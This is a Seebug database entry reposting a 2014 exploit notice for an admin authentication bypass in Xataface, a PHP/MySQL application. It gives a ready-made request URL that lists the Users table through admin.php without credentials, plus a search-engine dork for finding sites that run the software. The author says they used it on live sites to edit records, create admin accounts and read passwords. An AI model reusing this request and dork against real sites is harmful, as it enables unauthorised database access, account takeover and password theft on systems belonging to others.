Xataface Admin Auth Bypass Vulnerability

2014-07-01T00:00:00
ID SSV:68008
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                =======================================================
Xataface Admin Auth Bypass Vulnerability
=======================================================
#[+] Discovered by : Xinapse
#[+] Site          : firewire-security.com
#[+] Email         : admin@firewire-security.com

=======================================================
=======================================================

#[+] Vulnerability : Admin/database auth bypass vulnerability
#[+] Software      : Xataface - open source GPL, PHP, Mysql database
software
#[+] Vendor        : http://xataface.com
#[+] Usage         :
http://www.site.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list


#[+] Alert         : Most of the sites i tried running this software are
vulnerable, only a few used .htaccess
#[+] Dork          :"powered by dataface" "powered by xataface"
#[+] Description   : With this i could edit/delete/create records in the
database, create new admin accounts and view all the users and passwords.




#[+] Greetz        :firewire-security team, b10h4z4rd, g3org3